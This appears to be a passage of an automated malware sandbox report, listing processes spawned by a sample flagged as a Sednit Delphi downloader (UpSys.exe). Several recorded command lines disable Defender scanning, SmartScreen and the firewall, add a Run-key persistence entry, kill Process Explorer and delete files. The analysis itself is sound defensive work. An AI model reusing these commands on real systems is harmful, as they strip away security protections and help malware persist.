                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:27
                                                                                                                                                            Start time:09:51:34
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                                            Imagebase:0x7ff7338d0000
                                                                                                                                                            File size:51288 bytes
                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:29
                                                                                                                                                            Start time:09:51:35
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                                            Imagebase:0x7ff7338d0000
                                                                                                                                                            File size:51288 bytes
                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:30
                                                                                                                                                            Start time:09:51:37
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
                                                                                                                                                            Imagebase:0x7ff6ba650000
                                                                                                                                                            File size:447488 bytes
                                                                                                                                                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                            General

                                                                                                                                                            Target ID:31
                                                                                                                                                            Start time:09:51:38
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff647620000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:32
                                                                                                                                                            Start time:09:51:40
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM procexp.exe /F && exit
                                                                                                                                                            Imagebase:0x7ff7bb450000
                                                                                                                                                            File size:273920 bytes
                                                                                                                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:33
                                                                                                                                                            Start time:09:51:40
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM
                                                                                                                                                            Imagebase:0x7ff7bb450000
                                                                                                                                                            File size:273920 bytes
                                                                                                                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:34
                                                                                                                                                            Start time:09:51:41
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                            Imagebase:0x7ff7338d0000
                                                                                                                                                            File size:51288 bytes
                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:35
                                                                                                                                                            Start time:09:51:41
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff647620000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:36
                                                                                                                                                            Start time:09:51:41
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
                                                                                                                                                            Imagebase:0x7ff7bb450000
                                                                                                                                                            File size:273920 bytes
                                                                                                                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:37
                                                                                                                                                            Start time:09:51:41
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff647620000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:38
                                                                                                                                                            Start time:09:51:42
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:taskkill /IM procexp.exe /F
                                                                                                                                                            Imagebase:0x7ff7da910000
                                                                                                                                                            File size:94720 bytes
                                                                                                                                                            MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:39
                                                                                                                                                            Start time:09:51:42
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff647620000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:40
                                                                                                                                                            Start time:09:51:43
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM procexp.exe /F && exit
                                                                                                                                                            Imagebase:0x7ff7bb450000
                                                                                                                                                            File size:273920 bytes
                                                                                                                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:41
                                                                                                                                                            Start time:09:51:43
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:taskkill /IM
                                                                                                                                                            Imagebase:0x7ff7da910000
                                                                                                                                                            File size:94720 bytes
                                                                                                                                                            MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:42
                                                                                                                                                            Start time:09:51:43
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff647620000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:43
                                                                                                                                                            Start time:09:51:43
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit
                                                                                                                                                            Imagebase:0x7ff7bb450000
                                                                                                                                                            File size:273920 bytes
                                                                                                                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:44
                                                                                                                                                            Start time:09:51:43
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\ProgramData\UpSys.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                            File size:945944 bytes
                                                                                                                                                            MD5 hash:EFE5769E37BA37CF4607CB9918639932
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 0000002C.00000003.367524176.0000000003151000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                            • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 0000002C.00000002.380547096.00000000007ED000.00000004.00000010.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 0%, Metadefender, Browse
                                                                                                                                                            • Detection: 5%, ReversingLabs

                                                                                                                                                            General

                                                                                                                                                            Target ID:45
                                                                                                                                                            Start time:09:51:44
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:taskkill /IM procexp.exe /F
                                                                                                                                                            Imagebase:0x7ff7da910000
                                                                                                                                                            File size:94720 bytes
                                                                                                                                                            MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:46
                                                                                                                                                            Start time:09:51:44
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                            Imagebase:0x7ff7338d0000
                                                                                                                                                            File size:51288 bytes
                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:47
                                                                                                                                                            Start time:09:51:44
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff647620000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:48
                                                                                                                                                            Start time:09:51:44
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
                                                                                                                                                            Imagebase:0x7ff7bb450000
                                                                                                                                                            File size:273920 bytes
                                                                                                                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:49
                                                                                                                                                            Start time:09:51:45
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                                            Imagebase:0x7ff671590000
                                                                                                                                                            File size:163336 bytes
                                                                                                                                                            MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:50
                                                                                                                                                            Start time:09:51:45
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\WerFault.exe -pss -s 472 -p 6616 -ip 6616
                                                                                                                                                            Imagebase:0x7ff770e00000
                                                                                                                                                            File size:494488 bytes
                                                                                                                                                            MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:51
                                                                                                                                                            Start time:09:51:45
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff647620000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:52
                                                                                                                                                            Start time:09:51:46
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM
                                                                                                                                                            Imagebase:0x7ff7bb450000
                                                                                                                                                            File size:273920 bytes
                                                                                                                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:53
                                                                                                                                                            Start time:09:51:47
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff647620000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:54
                                                                                                                                                            Start time:09:51:47
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                                            Imagebase:0x7ff7338d0000
                                                                                                                                                            File size:51288 bytes
                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:55
                                                                                                                                                            Start time:09:51:47
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
                                                                                                                                                            Imagebase:0x7ff7bb450000
                                                                                                                                                            File size:273920 bytes
                                                                                                                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:56
                                                                                                                                                            Start time:09:51:48
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\netsh.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                                                                                                                                            Imagebase:0x7ff736fd0000
                                                                                                                                                            File size:92672 bytes
                                                                                                                                                            MD5 hash:98CC37BBF363A38834253E22C80A8F32
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:57
                                                                                                                                                            Start time:09:51:48
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:taskkill /IM
                                                                                                                                                            Imagebase:0x7ff7da910000
                                                                                                                                                            File size:94720 bytes
                                                                                                                                                            MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:58
                                                                                                                                                            Start time:09:51:48
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff647620000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:59
                                                                                                                                                            Start time:09:51:50
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\ProgramData\UpSys.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                            File size:945944 bytes
                                                                                                                                                            MD5 hash:EFE5769E37BA37CF4607CB9918639932
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 0000003B.00000003.390797612.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                            • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 0000003B.00000002.404252573.00000000007ED000.00000004.00000010.00020000.00000000.sdmp, Author: Florian Roth

                                                                                                                                                            General

                                                                                                                                                            Target ID:60
                                                                                                                                                            Start time:09:51:51
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\WerFault.exe -pss -s 528 -p 4352 -ip 4352
                                                                                                                                                            Imagebase:0x7ff770e00000
                                                                                                                                                            File size:494488 bytes
                                                                                                                                                            MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:61
                                                                                                                                                            Start time:09:51:52
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\WerFault.exe -u -p 6616 -s 2172
                                                                                                                                                            Imagebase:0x7ff770e00000
                                                                                                                                                            File size:494488 bytes
                                                                                                                                                            MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:62
                                                                                                                                                            Start time:09:51:55
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                            Imagebase:0x7ff613950000
                                                                                                                                                            File size:131584 bytes
                                                                                                                                                            MD5 hash:4578046C54A954C917BB393B70BA0AEB
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:63
                                                                                                                                                            Start time:09:52:00
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\ProgramData\UpSys.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                            File size:945944 bytes
                                                                                                                                                            MD5 hash:EFE5769E37BA37CF4607CB9918639932
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 0000003F.00000002.419246767.00000000007ED000.00000004.00000010.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                            • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 0000003F.00000003.405780371.0000000003011000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth

                                                                                                                                                            General

                                                                                                                                                            Target ID:64
                                                                                                                                                            Start time:09:52:00
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\WerFault.exe -u -p 4352 -s 2560
                                                                                                                                                            Imagebase:0x7ff770e00000
                                                                                                                                                            File size:494488 bytes
                                                                                                                                                            MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:65
                                                                                                                                                            Start time:09:52:00
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\ProgramData\UpSys.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                            File size:945944 bytes
                                                                                                                                                            MD5 hash:EFE5769E37BA37CF4607CB9918639932
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 00000041.00000003.407789264.0000000001A01000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                            • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 00000041.00000002.421739759.00000000007EB000.00000004.00000010.00020000.00000000.sdmp, Author: Florian Roth

                                                                                                                                                            General

                                                                                                                                                            Target ID:66
                                                                                                                                                            Start time:09:52:05
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\netsh.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                                                                                                                                            Imagebase:0x7ff736fd0000
                                                                                                                                                            File size:92672 bytes
                                                                                                                                                            MD5 hash:98CC37BBF363A38834253E22C80A8F32
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:67
                                                                                                                                                            Start time:09:52:06
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                                            Imagebase:0x7ff6ba650000
                                                                                                                                                            File size:447488 bytes
                                                                                                                                                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                            General

                                                                                                                                                            Target ID:68
                                                                                                                                                            Start time:09:52:06
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff647620000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:69
                                                                                                                                                            Start time:09:52:08
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\ProgramData\UpSys.exe
                                                                                                                                                            Wow64 process (32bit):false
